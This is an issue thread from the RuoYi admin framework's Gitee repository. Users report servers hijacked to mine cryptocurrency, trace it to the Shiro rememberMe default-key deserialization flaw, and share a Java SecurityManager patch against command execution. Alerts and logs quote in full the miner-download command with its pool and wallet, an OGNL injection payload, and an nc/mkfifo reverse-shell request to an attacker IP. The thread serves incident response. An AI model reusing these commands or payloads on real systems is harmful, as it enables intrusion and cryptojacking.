5K Star 30K Fork 15.6K

GVP若依 / RuoYi

 / 详情

云服务器程序运行中出现木马

Done
Opened this issue  
2021-02-18 15:51

该告警由如下引擎检测发现:
命令行: cmd.exe /c "pidof /tmp/watchdog || bash -c 'curl ** ** https://whatsmyipv4.cf/xmrig*** * -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'"
进程PID: 6936
进程文件名: cmd.exe
父进程ID: 11932
父进程: java.exe
父进程文件路径: C:/Program Files/Javak1.8.0_91/bin/java.exe
进程链:
-[7212] C:\Windows\Explorer.EXE
-[10648] "cmd.exe" /s /k pushd "D:\AprpDir123\miiccd"
-[11932] java -jar 123.jar

事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略

备注
该告警由如下引擎检测发现:
命令行: cmd.exe /c "pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'"
进程ID: 6936
父进程命令行: java -jar 123.jar
父进程文件路径: C:/Program Files/Javak1.8.0_91/bin/java.exe
父进程ID: 11932
事件说明: 检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。
进程链:
-[7212] C:\Windows\Explorer.EXE
-[10648] "cmd.exe" /s /k pushd "D:\AppDir\miic"
-[11932] java -jar 123.jar

Comments (29)

二聪 created任务
二聪 set related repository to 若依/RuoYi
Expand operation logs

命令行: curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog
进程PID: 7827
进程文件名: curl
父进程ID: 7826
父进程文件路径: /usr/bin/bash
进程链:
-[2337] java -Xms2048m -Xmx2048m -XX:PermSize=2048m -XX:MaxPermSize=2048m -XX:MaxNewSize=1024m -jar ruoyi-admin.jar
-[7823] /bin/sh -c pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'
-[7825] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
-[7826] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &

在1.23 同样被挖矿木马植入:
#I2F83H:阿里云告警漏洞,这个有遇到过吗?
今天下午,再次被同样木马植入,估计这个项目里面是有漏洞了,这个issue未解决前,先不要关闭了.

输入图片说明

目前日志中看到可疑攻击日志:

13:20:17.032 [http-nio-8086-exec-23] ERROR o.a.c.c.C.[.[.[.[dispatcherServlet] - [log,175] - Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Filtered request failed.] with root cause
org.apache.tomcat.util.http.fileupload.InvalidFileNameException: Invalid file name: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 88abe7aec077a15790f980021370c769').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\0b
	at org.apache.tomcat.util.http.fileupload.util.Streams.checkFileName(Streams.java:188)
	at org.apache.tomcat.util.http.fileupload.impl.FileItemStreamImpl.getName(FileItemStreamImpl.java:157)
	at org.apache.tomcat.util.http.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:286)
	at org.apache.catalina.connector.Request.parseParts(Request.java:2895)
	at org.apache.catalina.connector.Request.parseParameters(Request.java:3228)
	at org.apache.catalina.connector.Request.getParameter(Request.java:1127)
	at org.apache.catalina.connector.RequestFacade.getParameter(RequestFacade.java:381)
	at javax.servlet.ServletRequestWrapper.getParameter(ServletRequestWrapper.java:158)
	at org.apache.shiro.web.session.mgt.DefaultWebSessionManager.getReferencedSessionId(DefaultWebSessionManager.java:136)
	at org.apache.shiro.web.session.mgt.DefaultWebSessionManager.getSessionId(DefaultWebSessionManager.java:279)
	at org.apache.shiro.web.session.mgt.DefaultWebSessionManager.getSessionId(DefaultWebSessionManager.java:273)
	at org.apache.shiro.session.mgt.DefaultSessionManager.retrieveSession(DefaultSessionManager.java:216)
	at org.apache.shiro.session.mgt.AbstractValidatingSessionManager.doGetSession(AbstractValidatingSessionManager.java:118)
	at org.apache.shiro.session.mgt.AbstractNativeSessionManager.lookupSession(AbstractNativeSessionManager.java:148)
	at org.apache.shiro.session.mgt.AbstractNativeSessionManager.getSession(AbstractNativeSessionManager.java:140)
	at org.apache.shiro.mgt.SessionsSecurityManager.getSession(SessionsSecurityManager.java:156)
	at org.apache.shiro.mgt.DefaultSecurityManager.resolveContextSession(DefaultSecurityManager.java:461)
	at org.apache.shiro.mgt.DefaultSecurityManager.resolveSession(DefaultSecurityManager.java:447)
	at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:343)
	at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:845)
	at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
	at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
	at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
	at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.alibaba.druid.support.http.WebStatFilter.doFilter(WebStatFilter.java:124)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:202)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:542)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143)
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:374)
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:888)
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1597)
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.lang.Thread.run(Thread.java:748)
java.lang.IllegalArgumentException: Invalid character found in the request target [/incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/p;nc%20-w%205%2089.248.170.31%209772%200%3C/tmp/p|/bin/sh%3E/tmp/p%202%3E/tmp/p;rm%20/tmp/p%22%20--%3e]. The valid characters are defined in RFC 7230 and RFC 3986
	at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:486)
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:261)
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:868)
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1590)
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.lang.Thread.run(Thread.java:748)

@红亮 @haiya_oschina @二聪
被攻击没有办法,你只能做防护,而且你们发的这些信息都不像是框架的原因
1、上面的命令明显被挂马了,Windows 的还是第一次见到,可以找找相关资料
2、你发的异常信息那是已经拦截了,如果命令被执行,那不会出现异常的,都异常了哪有漏洞?不想显示异常可以全局捕获这个异常做自定义提示
对于矿机木马,一般都是redismysqlpgsql出现的,从弱口令登录后做的进程挂马,很少有从系统登录挂马的,除非你系统有不需要登录访问的接口,给你一个解除木马的方法:记一次服务器linux(centos7)被postgres病毒攻击的事故,这个我用过,是管用的,另外,除了应用端口,其他端口不要对外开放,一般配置如下
1、只开放808443/443、远程登录端口(不要用默认的,比如22或者3389,也可以做端口转发或者ssh转发)
2、禁止ping
3、服务器登录密码使用64位随机数,定期更换密码
4、服务器设置登录失败延时策略(对爆破式攻击基本无效,可以不做设置)
5、设置指定ip访问远程

另外,去查询你们服务器的登录日志,多数都是爆破攻击

附其他类似解决方案
【应急类漏洞】Linux下变种DDG挖矿病毒紧急通告及处置方法
watchdogs挖矿木马综合分析报告

@Ricky
1、目前看服务器上没有出现直接被登录系统挂马的情况,都有采取ssh和公司ip才能登陆服务器,这种情况不考虑。
2、我知道上面的日志是被拦截了的,说明还是出现了没有被拦截到,并且没有日志记录的挂马。
3、从父进程看确实是从ruoyi这个进程引入的任意命令行执行漏洞,当然具体是ruoyi内部引入的第三方框架问题还是ruoyi本身的问题,目前我这边定位不出来。
4、服务器端口都严格的防火墙控制,暂时不考虑这个导致。
5、目前的临时解决方案是直接利用java安全机制(SecurityManager)禁止掉外部命令执行(不能根治!)

目前已经在这个框架中 多系统,多人,多次 出现被挂马,而且是任意执行命令,已经严重可以 直接删除服务器任何东西和获取任意数据 ,请重视起来,最终的目标是找到漏洞解决掉,而不是一直推给框架以外的第三方,虽然可能是第三方导致,但是毕竟是在这里发生了。

已经发生两次了,再发生一次,估计我要被炒鱿鱼,看来也要准备第二套方案,看看能不能迁移到别的框架了 :sob:

刚去检查另外一个服务器,也是用了这个ruoyi框架,同样被挂了一样的挖矿木马,这还能玩……

木马是从cookie传过来的。
输入图片说明
设置若依后台用户名密码?

@红亮 可以试试停掉这台服务器上的应用,删除有关的项目,在其他服务器上用war部署一下先跑着,这样你就可以确定是服务器的问题还是项目的问题

若依 changed description

看日志的话是有恶意脚本在上传,系统除了几个公开的地址能访问,其他的均会被拦截。需登录后查才能访问。

所以你可以按照这个思路先去检查一下,首先上传的路径是profile,检查这个路径下面是否有被上传过恶意脚本,这个也是需要登录后才能进行上传。(我觉得如果是系统问题的话,有可能是这里出现的问题,这个通用上传也都有一些限制条件,不符合规范的会抛出异常)

ruoyi:
  # 文件路径 示例( Windows配置D:/ruoyi/uploadPath,Linux配置 /home/ruoyi/uploadPath)
  profile: D:/ruoyi/uploadPath

如果没有,那极有可能是其他插件或服务导致,其他的服务可以自己检查一下,tomcat可以升级或更换jettyundertow等容器在进行观察。

这种木马以前也有中过,都是redismysql等导致。不过也不排除是其他的问题,如果后续有反馈并且和框架相关漏洞会进行通知。或者你有更详细的内容也可以陆续提供上来参考分析。

如果有对外开放的上传接口,建议做加密参数,文件落地前进行验签,脚本落地才能执行

Ricky set top level to High
若依 changed top level from High to Not top
若依 changed issue state from 待办的 to 已完成

@Ricky @若依 好久没关注这个issue了,看了你们的回复,我是觉得你们没有认真看上面的攻击路径,这个根本不是文件上传,是有地方动态执行了jvm的shell命令,而且看上面阿里云给的路径就知道就是ruoyi对应的java.exe执行的,我是直接禁用了任何jvm调用shell命令后,才没有再次中马。

我觉得方向可能是这个后台有什么地方能执行jvm shell命令,比如那个获取系统信息的好像会执行,具体是怎么攻击的,我也不清楚,我只能从最后生效的位置堵上漏洞

怎么解决了的,我这里前两天又出现了。

这个漏洞应该就是系统里面哪里有jvm执行漏洞,根本就不是作者说的什么口令弱,或者私钥没替换。

找不到漏洞位置,这个问题要解决也简单,直接把jvm shell 命令直接禁止掉就好了

具体实现见最下面的统一回复吧

我的解决方案已经回复在这个issue尾部了,你看看对你有没有帮助,我这边反正加上就再也没有出现过被执行挖矿命令了

命令执行漏洞 RuoYi <= v4.3.0
若依管理系统使用了Apache Shiro,Shiro 提供了记住我(RememberMe)的功能,下次访问时无需再登录即可访问。系统将密钥硬编码在代码里,且在官方文档中并没有强调修改该密钥,导致框架使用者大多数都使用了默认密钥。攻击者可以构造一个恶意的对象,并且对其序列化、AES加密、base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞,进而在目标机器上执行任意命令。

检测漏洞:ShiroConfig.java 是否包含 fCq+/xW488hMTCD+cmJ3aQ==,如果是使用的默认密钥则需要修改,防止被执行命令攻击。

解决方案:升级版本到 >=v.4.3.1,并且重新生成一个新的秘钥替换cipherKey,保证唯一且不要泄漏。

阿里云版本
uname -a
Linux api.xxx.com 3.10.0-957.21.2.el7.x86_64 Wed Jun 5 14:26:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

若依版本 v4.6.0

bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
也出现了这个问题

大致就是这么两种情况。
1、shiro秘钥没有更换,任何版本都需要重新生成更换,或者去掉记住我这个功能~
2、有端口对外开放且是弱密码,被暴力破解了。

能否提供那个时间段的报错日志呢?

@若依 本来是不再理会这个issue的了,但是上面有人找我要修复代码,这里我给下我的解决方案,我觉得作者还是把这个issue打开,让更多被攻击的人看到:

把下面的代码添加到项目中就可以禁止jvm命令执行了,禁止后,后台那个查看系统信息的功能就用不了

package com.ruoyi.common.config.security;

import com.ruoyi.common.config.RuoYiConfig;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Component;
import sun.reflect.Reflection;

import javax.annotation.PostConstruct;
import java.security.Permission;

/**
 * @author hongliang
 * 禁止java执行cmd外部命令,防止调用外部命令进行木马攻击
 */
@Component
public class JvmExecForbid {
    protected final Logger logger = LoggerFactory.getLogger(JvmExecForbid.class);

    @PostConstruct
    public void init() {
        logger.info("start JvmExecForbid!!!!");
        forbidJvmCmd();
    }

    /**
     * 禁止执行java执行外部命令(Rumtine.exec)
     * 避免被执行恶心命令
     * https://www.anquanke.com/post/id/151398
     */
    public static void forbidJvmCmd() {

        // 创建自己的SecurityManager
        SecurityManager sm = new SecurityManager() {
            private void check(Permission perm) {
                // 禁止exec
                if (perm instanceof java.io.FilePermission) {
                    String actions = perm.getActions();
                    if (actions != null && actions.contains("execute")) {
                        throw new SecurityException("execute denied! It could be a Trojan horse attack ");
                    }
                }
                // 禁止设置新的SecurityManager,保护自己
                if (perm instanceof java.lang.RuntimePermission) {
                    String name = perm.getName();
                    if (name != null && name.contains("setSecurityManager")) {
                        throw new SecurityException("System.setSecurityManager denied!");
                    }
                }
            }

            @Override
            public void checkPermission(Permission perm) {
                check(perm);
            }

            @Override
            public void checkPermission(Permission perm, Object context) {
                check(perm);
            }
        };
        System.setSecurityManager(sm);
        //禁止反射调用绕过安全设置
        try {
            Class clz = Class.forName("java.lang.ProcessImpl");
            Reflection.registerMethodsToFilter(clz, "start");
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }
    }
}

红亮哥,你好。这段代码在启动的时候会陷入循环调用中,即执行到perm instanceof java.io.FilePermission这块逻辑与checkPermission(Permission perm)方法一直在循环调用。有时间帮忙解答下,谢了 :smiley:

我们阿里云服务器也出现这个问题,希望作者重视
-[32059] java -jar -Xms256m -Xmx1024m -XX:MetaspaceSize=128m -XX:MaxMetaspaceSize=512m ruoyi.jar
-[28294] /bin/sh -c pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'
-[28297] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
-[28298] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &

你可以看看你登录界面有默认密码吗?
木马是登录了你的若依系统通过request请求发过来的。
输入图片说明
这是当时的ip------89.248.165.10

同样,我也遇上了同样问题,一个月内两次发现CPU被watchdog上的某进程吃满。

uname -a

Linux ebs-5811 4.18.0-193.el8.x86_64 #1:用户新增密码未加密 删除逻辑应增加判断 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

若依 v4.6.0

ps -ef |grep watchdog

root 12 2 0 Jun26 ? 00:00:00 [watchdog/0]
root 15 2 0 Jun26 ? 00:00:00 [watchdog/1]
root 37 2 0 Jun26 ? 00:00:00 [watchdogd]
root 2893 1 0 Jun26 ? 00:00:00 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
root 2897 2893 99 Jun26 ? 7-03:59:59 /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls
root 291837 290001 0 14:48 pts/0 00:00:00 grep --color=auto watchdog

我也遇上了同样的问题,部署了若依的项目后,测试,生产系统都被植入了挖矿木马,望解决输入图片说明

攻击补充
01:13:30.597 [http-nio-9070-exec-28] WARN o.a.s.m.AbstractRememberMeManager - [onRememberedPrincipalFailure,449] - There was a failure while trying to retrieve remembered principals. This could be due to a configuration problem or corrupted principals. This could also be due to a recently changed encryption key, if you are using a shiro.ini file, this property would be 'securityManager.rememberMeManager.cipherKey' see: http://shiro.apache.org/web.html#Web-RememberMeServices. The remembered identity will be forgotten and not used for this request.
01:13:30.599 [http-nio-9070-exec-28] WARN o.a.s.m.DefaultSecurityManager - [getRememberedIdentity,617] - Delegate RememberMeManager instance of type [org.apache.shiro.web.mgt.CookieRememberMeManager] threw an exception during getRememberedPrincipals().
org.apache.shiro.crypto.CryptoException: Unable to correctly extract the Initialization Vector or ciphertext.
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:378)
at org.apache.shiro.mgt.AbstractRememberMeManager.decrypt(AbstractRememberMeManager.java:482)
at org.apache.shiro.mgt.AbstractRememberMeManager.convertBytesToPrincipals(AbstractRememberMeManager.java:419)
at org.apache.shiro.mgt.AbstractRememberMeManager.getRememberedPrincipals(AbstractRememberMeManager.java:386)
at org.apache.shiro.mgt.DefaultSecurityManager.getRememberedIdentity(DefaultSecurityManager.java:612)
at org.apache.shiro.mgt.DefaultSecurityManager.resolvePrincipals(DefaultSecurityManager.java:500)
at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:346)
at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:845)
at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at com.alibaba.druid.support.http.WebStatFilter.doFilter(WebStatFilter.java:124)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:92)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.HiddenHttpMethodFilter.doFilterInternal(HiddenHttpMethodFilter.java:93)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:200)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:490)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:139)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:408)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:791)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1417)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.ArrayIndexOutOfBoundsException: null
at java.lang.System.arraycopy(Native Method)
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:370)
... 48 common frames omitted
01:13:31.558 [http-nio-9070-exec-29] WARN o.a.s.m.AbstractRememberMeManager - [onRememberedPrincipalFailure,449] - There was a failure while trying to retrieve remembered principals. This could be due to a configuration problem or corrupted principals. This could also be due to a recently changed encryption key, if you are using a shiro.ini file, this property would be 'securityManager.rememberMeManager.cipherKey' see: http://shiro.apache.org/web.html#Web-RememberMeServices. The remembered identity will be forgotten and not used for this request.
01:13:31.559 [http-nio-9070-exec-29] WARN o.a.s.m.DefaultSecurityManager - [getRememberedIdentity,617] - Delegate RememberMeManager instance of type [org.apache.shiro.web.mgt.CookieRememberMeManager] threw an exception during getRememberedPrincipals().
org.apache.shiro.crypto.CryptoException: Unable to execute 'doFinal' with cipher instance [javax.crypto.Cipher@1126cfed].
at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:462)
at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:445)
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:390)
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:382)
at org.apache.shiro.mgt.AbstractRememberMeManager.decrypt(AbstractRememberMeManager.java:482)
at org.apache.shiro.mgt.AbstractRememberMeManager.convertBytesToPrincipals(AbstractRememberMeManager.java:419)
at org.apache.shiro.mgt.AbstractRememberMeManager.getRememberedPrincipals(AbstractRememberMeManager.java:386)
at org.apache.shiro.mgt.DefaultSecurityManager.getRememberedIdentity(DefaultSecurityManager.java:612)
at org.apache.shiro.mgt.DefaultSecurityManager.resolvePrincipals(DefaultSecurityManager.java:500)
at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:346)
at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:845)
at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at com.alibaba.druid.support.http.WebStatFilter.doFilter(WebStatFilter.java:124)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
